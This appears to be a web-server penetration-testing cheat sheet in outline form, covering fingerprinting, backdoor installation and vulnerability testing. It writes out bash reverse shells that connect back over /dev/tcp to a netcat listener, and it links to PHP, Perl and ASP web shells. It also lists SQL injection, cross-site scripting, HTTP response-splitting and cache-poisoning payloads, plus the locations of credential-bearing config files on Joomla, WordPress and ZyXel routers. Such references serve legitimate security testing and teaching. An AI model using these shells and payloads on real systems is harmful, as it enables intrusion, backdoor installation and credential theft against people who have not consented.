• Fingerprint server
  • Crawl website
    • lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
    • httprint
    • Metagoofil
      • metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
  • Web Directory enumeration
  • Vulnerability Assessment
    • Manual Tests
      • Default Passwords
      • Install Backdoors
        • ASP
          • http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
        • Assorted
          • http://michaeldaw.org/projects/web-backdoor-compilation/
          • http://open-labs.org/hacker_webkit02.tar.gz
        • Perl
          • http://home.arcor.de/mschierlm/test/pmsh.pl
          • http://pentestmonkey.net/tools/perl-reverse-shell/
          • http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
        • PHP
          • http://php.spb.ru/remview/
          • http://pentestmonkey.net/tools/php-reverse-shell/
          • http://pentestmonkey.net/tools/php-findsock-shell/
        • Python
          • http://matahari.sourceforge.net/
        • TCL
          • http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
        • Bash Connect Back Shell
          • GnuCitizen
            • Atttack Box: nc -l -p Port -vvv
            • Victim: $ exec 5<>/dev/tcp/IP_Address/PortVictim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
          • Neohapsis
            • Atttack Box: nc -l -p Port -vvv
            • Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdinVictim: $ exec 1>&0 # Next we copy stdin to stdoutVictim: $ exec 2>&0 # And finally stdin to stderrVictim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
      • Method Testing
        • nc IP_Adress Port
          • HEAD / HTTP/1.0
          • OPTIONS / HTTP/1.0
          • PROPFIND / HTTP/1.0
          • TRACE / HTTP/1.1
          • PUT http://Target_URL/FILE_NAME
          • POST http://Target_URL/FILE_NAME HTTP/1.x
      • Upload Files
        • curl
          • curl -u <username:password> -T file_to_upload <Target_URL>
          • curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” <Target_URL>
        • put.pl
          • put.pl -h target -r /remote_file_name -f local_file_name
        • webdav
      • View Page Source
        • Hidden Values
        • Developer Remarks
        • Extraneous Code
        • Passwords!
      • Input Validation Checks
        • NULL or null
          • Possible error messages returned.
        • ‘ , ” , ; , <!
          • Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
        • – , = , + , “
          • Used to craft SQL Injection queries.
        • ‘ , &, ! , ¦ , < , >
          • Used to find command execution vulnerabilities.
        • “><script>alert(1)</script>
          • Basic Cross-Site Scripting Checks.
        • %0d%0a
          • Carriage Return (%0d) Line Feed (%0a)
            • HTTP Splitting
              • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
                • i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
            • Cache Poisoning
              • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
        • %7f , %ff
          • byte-length overflows; maximum 7- and 8-bit values.
        • -1, other
          • Integer and underflow vulnerabilities.
        • %n , %x , %s
          • Testing for format string vulnerabilities.
        • ../
          • Directory Traversal Vulnerabilities.
        • % , _, *
          • Wildcard characters can sometimes present DoS issues or information disclosure.
        • Ax1024+
          • Overflow vulnerabilities.
      • Automated table and column iteration
        • orderby.py
          • ./orderby.py www.site.com/index.php?id=
        • d3sqlfuzz.py
          • ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE–
    • Vulnerability Scanners
    • Specific Applications/ Server Tools
      • Domino
      • Joomla
        • cms_few
          • ./cms.py <site-name>
        • joomsq
          • ./joomsq.py <IP>
        • joomlascan
          • ./joomlascan.py <site> <options>  [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don’t show 404 responses]
        • joomscan
          • ./joomscan.py -u “www.site.com/joomladir/” -o site.txt -p 127.0.0.1:80
        • jscan
          • jscan.pl -f hostname
          • (shell.txt required)
      • aspaudit.pl
        • asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
      • Vbulletin
        • vbscan.py
          • vbscan.py <host> <port> -v
          • vbscan.py -update
      • ZyXel
        • zyxel-bf.sh
        • snmpwalk
          • snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
        • snmpget
          • snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
  • Proxy Testing
  • Examine configuration files
    • Generic
      • Examine httpd.conf/ windows config files
    • JBoss
      • JMX Console http://<IP>:8080/jmxconcole/
    • Joomla
      • configuration.php
      • diagnostics.php
      • joomla.inc.php
      • config.inc.php
    • Mambo
      • configuration.php
      • config.inc.php
    • WordPress
      • setup-config.php
      • wp-config.php
    • ZyXel
      • /WAN.html (contains PPPoE ISP password)
      • /WLAN_General.html and /WLAN.html (contains WEP key)
      • /rpDyDNS.html (contains DDNS credentials)
      • /Firewall_DefPolicy.html (Firewall)
      • /CF_Keyword.html (Content Filter)
      • /RemMagWWW.html (Remote MGMT)
      • /rpSysAdmin.html (System)
      • /LAN_IP.html (LAN)
      • /NAT_General.html (NAT)
      • /ViewLog.html (Logs)
      • /rpFWUpload.html (Tools)
      • /DiagGeneral.html (Diagnostic)
      • /RemMagSNMP.html (SNMP Passwords)
      • /LAN_ClientList.html (Current DHCP Leases)
      • Config Backups
        • /RestoreCfg.html
        • /BackupCfg.html
        • Note: – The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
  • Examine web server logs
    • c:\winnt\system32\Logfiles\W3SVC1
      • awk -F ” ” ‘{print $3,$11} filename | sort | uniq
  • References
  • Exploit Frameworks